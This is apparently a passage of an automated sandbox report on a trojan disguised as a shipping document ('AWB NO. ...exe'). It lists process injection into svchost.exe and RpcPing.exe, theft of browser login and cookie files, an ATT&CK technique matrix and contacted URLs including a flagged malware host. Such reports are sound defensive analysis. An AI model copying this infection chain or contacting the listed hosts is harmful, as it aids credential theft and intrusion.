            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBD4A0 mov eax, dword ptr fs:[00000030h]2_2_02FBD4A0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F644A8 mov eax, dword ptr fs:[00000030h]2_2_02F644A8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B55F mov eax, dword ptr fs:[00000030h]2_2_0300B55F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0300B55F mov eax, dword ptr fs:[00000030h]2_2_0300B55F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6B490 mov eax, dword ptr fs:[00000030h]2_2_02F6B490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6B490 mov eax, dword ptr fs:[00000030h]2_2_02F6B490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02FBC490 mov eax, dword ptr fs:[00000030h]2_2_02FBC490
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F30485 mov ecx, dword ptr fs:[00000030h]2_2_02F30485
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02F6648A mov eax, dword ptr fs:[00000030h]2_2_02F6648A
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6648A mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F38470 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FEF478 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02FFA464 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F6D450 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F3D454 mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F5E45E mov eax, dword ptr fs:[00000030h]
            Source: C:\Windows\SysWOW64\svchost.exe Code function: 2_2_02F40445 mov eax, dword ptr fs:[00000030h]
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_004581F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0042A364 SetUnhandledExceptionFilter
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0042A395 SetUnhandledExceptionFilter,UnhandledExceptionFilter

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtSetInformationThread: Direct from: 0x779D6319
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtQueryInformationToken: Direct from: 0x779E2BCC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtOpenFile: Direct from: 0x779E2CEC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtNotifyChangeKey: Direct from: 0x779E3B4C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtCreateFile: Direct from: 0x779E2F0C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtAllocateVirtualMemory: Direct from: 0x779E2B0C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtOpenSection: Direct from: 0x779E2D2C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtQueryVolumeInformationFile: Direct from: 0x779E2E4C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtDeviceIoControlFile: Direct from: 0x779E2A0C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtQueryAttributesFile: Direct from: 0x779E2D8C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtSetInformationThread: Direct from: 0x779E2A6C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtCreateKey: Direct from: 0x779E2B8C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtClose: Direct from: 0x779E2A8C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtProtectVirtualMemory: Direct from: 0x779E2EBC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtCreateUserProcess: Direct from: 0x779E363C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtQueryInformationProcess: Direct from: 0x779E2B46
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtResumeThread: Direct from: 0x779E2EDC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtWriteVirtualMemory: Direct from: 0x779E482C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtOpenKeyEx: Direct from: 0x779E2ABC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtAllocateVirtualMemory: Direct from: 0x779E480C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtDelayExecution: Direct from: 0x779E2CFC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtQuerySystemInformation: Direct from: 0x779E47EC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtReadFile: Direct from: 0x779E29FC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtQuerySystemInformation: Direct from: 0x779E2D1C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtAllocateVirtualMemory: Direct from: 0x779E2B1C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtResumeThread: Direct from: 0x779E35CC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtMapViewOfSection: Direct from: 0x779E2C3C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtWriteVirtualMemory: Direct from: 0x779E2D5C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtProtectVirtualMemory: Direct from: 0x779D7A4E
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtSetInformationProcess: Direct from: 0x779E2B7C
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtAllocateVirtualMemory: Direct from: 0x779E3BBC
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe NtReadVirtualMemory: Direct from: 0x779E2DAC
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RpcPing.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RpcPing.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RpcPing.exe Thread register set: target process: 1088
            Source: C:\Windows\SysWOW64\RpcPing.exe Thread APC queued: target process: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 27F008
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00458C93 LogonUserW
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00403B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00404A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00464EC9 mouse_event
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\AWB NO. 077-57676135055.exe"
            Source: C:\Program Files (x86)\QDDYBUsOSIrUnKhQnRdQSkpzAmPBgXmqwzgPDIagYOtvjhNrDkkLmcM\jFlHFdZgIYNZqR.exe Process created: C:\Windows\SysWOW64\RpcPing.exe "C:\Windows\SysWOW64\RpcPing.exe"
            Source: C:\Windows\SysWOW64\RpcPing.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_004581F7 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00464C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid
            Source: AWB NO. 077-57676135055.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Program Manager
            Source: AWB NO. 077-57676135055.exe, jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: jFlHFdZgIYNZqR.exe, 00000003.00000000.18450391134.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000003.00000002.23185597181.0000000001310000.00000002.00000001.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23186436511.00000000014F0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0042886B cpuid
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_004350D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00442230 GetUserNameW
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_0043418A GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00404AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo

            Stealing of Sensitive Information

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\RpcPing.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\RpcPing.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\
            Source: AWB NO. 077-57676135055.exe Binary or memory string: WIN_81
            Source: AWB NO. 077-57676135055.exe Binary or memory string: WIN_XP
            Source: AWB NO. 077-57676135055.exe Binary or memory string: WIN_XPe
            Source: AWB NO. 077-57676135055.exe Binary or memory string: WIN_VISTA
            Source: AWB NO. 077-57676135055.exe Binary or memory string: WIN_7
            Source: AWB NO. 077-57676135055.exe Binary or memory string: WIN_8
            Source: AWB NO. 077-57676135055.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

            Remote Access Functionality

            Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match File source: 00000002.00000002.18533462079.0000000002D90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23184804964.0000000002AE0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.18532632938.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000003.00000002.23186298424.00000000050F0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23186502535.0000000003120000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000004.00000002.23186224923.0000000002F40000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 00000002.00000002.18534395996.0000000005E00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00476596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket
            Source: C:\Users\user\Desktop\AWB NO. 077-57676135055.exe Code function: 0_2_00476A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket
            | Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact |
            | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- | --- |
            | Gather Victim Identity Information | Acquire Infrastructure | 2 Valid Accounts | 2 Native API | 1 DLL Side-Loading | 1 Exploitation for Privilege Escalation | 1 Disable or Modify Tools | 1 OS Credential Dumping | 2 System Time Discovery | Remote Services | 1 Archive Collected Data | 4 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot |
            | Credentials | Domains | Default Accounts | Scheduled Task/Job | 2 Valid Accounts | 1 Abuse Elevation Control Mechanism | 1 Deobfuscate/Decode Files or Information | 21 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 1 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service |
            | Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | Security Account Manager | 2 File and Directory Discovery | SMB/Windows Admin Shares | 1 Email Collection | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact |
            | Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 2 Valid Accounts | 2 Obfuscated Files or Information | NTDS | 116 System Information Discovery | Distributed Component Object Model | 21 Input Capture | 4 Application Layer Protocol | Traffic Duplication | Data Destruction |
            | Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 21 Access Token Manipulation | 1 DLL Side-Loading | LSA Secrets | 151 Security Software Discovery | SSH | 3 Clipboard Data | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact |
            | Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 412 Process Injection | 2 Valid Accounts | Cached Domain Credentials | 2 Virtualization/Sandbox Evasion | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop |
            | DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Virtualization/Sandbox Evasion | DCSync | 3 Process Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery |
            | Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 21 Access Token Manipulation | Proc Filesystem | 11 Application Window Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement |
            | Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 412 Process Injection | /etc/passwd and /etc/shadow | 1 System Owner/User Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement |
            Behavior Graph ID: 1467058, Sample: AWB NO. 077-57676135055.exe, Startdate: 03/07/2024, Architecture: WINDOWS, Score: 100
            Process chain shown in the graph: AWB NO. 077-57676135055.exe (started) -> svchost.exe (started) -> jFlHFdZgIYNZqR.exe (injected) -> RpcPing.exe (started) -> jFlHFdZgIYNZqR.exe (injected) and firefox.exe (started)

            | Source | Detection | Scanner | Label | Link |
            | --- | --- | --- | --- | --- |
            | AWB NO. 077-57676135055.exe | 100% | Joe Sandbox ML | | |
            | AWB NO. 077-57676135055.exe | 47% | ReversingLabs | Win32.Trojan.Strab | |
            No Antivirus matches
            | Source | Detection | Scanner | Label | Link |
            http://www.motorsportgives.com/9qp3/0%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?be472e8744edb3816324a1183cdffac60%Avira URL Cloudsafe
            http://vintagewins.com/n8dl/?vX=FC280%Avira URL Cloudsafe
            https://hm.baidu.com/hm.js?800ccf274c3a593a3653e6acbfb00c7c0%Avira URL Cloudsafe
            https://lakemontbellevue.net/wp-content/uploads/2024/05/Lakemont-Logo-1-1.png0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress//assets/js/screen-reader-text.js?ver=0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/menu.css?ver=6.5.50%Avira URL Cloudsafe
            http://www.lakemontbellevue.com/bjbg/100%Avira URL Cloudmalware
            http://www.paliinfra.com/12kg/0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awp-marketing-agency/assets/css/dark-brown-theme.css?v0%Avira URL Cloudsafe
            https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=0%Avira URL Cloudsafe
            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?resize=300%2C0%Avira URL Cloudsafe
            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/all.min.css?ver=6.5.50%Avira URL Cloudsafe
            http://www.paliinfra.com/12kg/?vX=FNzl8wnE++HPhG206OaKKCmPORssckNSyI+M4a86U0qBkTFFPriGBeWQyCEz+v1Kx2tJcxLpZ/phLMA1BmxsvaSisGFPcKMREi9fCQxgCdocMTbgTC3h6NU=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
            http://www.vintagewins.com/n8dl/?vX=FC28+8TNt1EBJ9Rr13Lf8bY2TrPAAO0Ms+TIyItlK84e+VLAwR127cfT6eGfINY83g5c74t6Ntc+Rr+iqurKq/8v/YzcG8LG32bad+3/XATcsm3Xq6o13Rk=&_B7=LxyxWrj8kri0gh0%Avira URL Cloudsafe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
Name | Malicious | Antivirus Detection | Reputation
Name | Source | Malicious | Antivirus Detection | Reputation
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://lakemontbellevue.net/xmlrpc.php?rsdRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://yoast.com/wordpress/plugins/seo/RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://support.google.com/chrome/?p=plugin_flashRpcPing.exe, 00000004.00000002.23189698242.0000000007B82000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-includes/js/comment-reply.min.js?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/css/animate.css?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/bootstrap.min.js?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            https://i0.wp.com/lakemontbellevue.net/wp-content/uploads/2024/05/MacPhersons-Logo.png?w=512&amp;sslRpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
                                                            http://lakemontbellevue.net/wp-content/themes/awpbusinesspress/assets/js/main.js?ver=6.5.5RpcPing.exe, 00000004.00000002.23187811443.0000000004690000.00000004.10000000.00040000.00000000.sdmp, jFlHFdZgIYNZqR.exe, 00000005.00000002.23187306582.0000000003AD0000.00000004.00000001.00040000.00000000.sdmpfalse
                                                            • Avira URL Cloud: safe
                                                            unknown
